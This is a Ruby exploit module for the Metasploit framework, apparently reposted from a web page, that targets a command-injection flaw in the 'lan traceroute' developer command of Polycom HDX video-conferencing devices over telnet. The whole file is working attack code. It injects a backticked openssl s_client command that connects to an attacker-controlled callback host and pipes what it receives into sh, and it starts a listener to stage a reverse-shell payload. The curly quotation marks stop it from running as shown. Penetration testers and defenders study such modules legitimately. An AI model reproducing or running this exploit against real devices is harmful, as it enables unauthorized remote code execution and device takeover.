Polycom Shell HDX Series Traceroute Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Polycom Shell HDX Series Traceroute Command Execution’,
‘Description’ => %q{
Within Polycom command shell, a command execution flaw exists in
lan traceroute, one of the dev commands, which allows for an
attacker to execute arbitrary payloads with telnet or openssl.
},
‘Author’ => [
‘Mumbai’, #
‘staaldraad’, # https://twitter.com/_staaldraad/
‘Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>’, # took some of the code from polycom_hdx_auth_bypass
‘h00die <[email protected]>’ # stole the code, creds to them
],
‘References’ => [
[‘URL’, ‘https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/’]
],
‘DisclosureDate’ => ‘Nov 12 2017’,
‘License’ => MSF_LICENSE,
‘Platform’ => ‘unix’,
‘Arch’ => ARCH_CMD,
‘Stance’ => Msf::Exploit::Stance::Aggressive,
‘Targets’ => [[ ‘Automatic’, {} ]],
‘Payload’ => {
‘Space’ => 8000,
‘DisableNops’ => true,
‘Compat’ => { ‘PayloadType’ => ‘cmd’, ‘RequiredCmd’ => ‘telnet generic openssl’}
},
‘DefaultOptions’ => { ‘PAYLOAD’ => ‘cmd/unix/reverse’ },
‘DefaultTarget’ => 0
))

register_options(
[
Opt::RHOST(),
Opt::RPORT(23),
OptString.new(‘PASSWORD’, [ false, “Password to access console interface if required.”]),
OptAddress.new(‘CBHOST’, [ false, “The listener address used for staging the final payload” ]),
OptPort.new(‘CBPORT’, [ false, “The listener port used for staging the final payload” ])
])
end

def check
connect
Rex.sleep(1)
res = sock.get_once
disconnect
if !res && !res.empty?
return Exploit::CheckCode::Unknown
elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end

def exploit
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, “#{peer} – Failed to connect to target service”)
end

#
# Obtain banner information
#
sock = connect
Rex.sleep(2)
banner = sock.get_once
vprint_status(“Received #{banner.length} bytes from service”)
vprint_line(“#{banner}”)
if banner =~ /password/i
print_status(“Authentication enabled on device, authenticating with target…”)
if datastore[‘PASSWORD’].nil?
print_error(“#{peer} – Please supply a password to authenticate with”)
return
end
# couldnt find where to enable auth in web interface or telnet…but according to other module it exists..here in case.
sock.put(“#{datastore[‘PASSWORD’]}\n”)
res = sock.get_once
if res =~ /Polycom/
print_good(“#{peer} – Authenticated successfully with target.”)
elsif res =~ /failed/
print_error(“#{peer} – Invalid credentials for target.”)
return
end
elsif banner =~ /Polycom/ # praise jesus
print_good(“#{peer} – Device has no authentication, excellent!”)
end
do_payload(sock)
end

def do_payload(sock)
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore[‘CBHOST’] || datastore[‘LHOST’] || Rex::Socket.source_address(datastore[‘RHOST’])

# Start a listener
start_listener(true)

# Figure out the port we picked
cbport = self.service.getsockname[2]
cmd = “devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n”
sock.put(cmd)
if datastore[‘VERBOSE’]
Rex.sleep(2)
resp = sock.get_once
vprint_status(“Received #{resp.length} bytes in response”)
vprint_line(resp)
end

# Give time for our command to be queued and executed
1.upto(5) do
Rex.sleep(1)
break if session_created?
end
end

def stage_final_payload(cli)
print_good(“Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}…”)
cli.put(payload.encoded + “\n”)
end

def start_listener(ssl = false)
comm = datastore[‘ListenerComm’]
if comm == ‘local’
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end

self.service = Rex::Socket::TcpServer.create(
‘LocalPort’ => datastore[‘CBPORT’],
‘SSL’ => ssl,
‘SSLCert’ => datastore[‘SSLCert’],
‘Comm’ => comm,
‘Context’ =>
{
‘Msf’ => framework,
‘MsfExploit’ => self
}
)

self.service.on_client_connect_proc = proc { |client|
stage_final_payload(client)
}

# Start the listening service
self.service.start
end

# Shut down any running services
def cleanup
super
if self.service
print_status(“Shutting down payload stager listener…”)
begin
self.service.deref if self.service.is_a?(Rex::Service)
if self.service.is_a?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end

# Accessor for our TCP payload stager
attr_accessor :service
end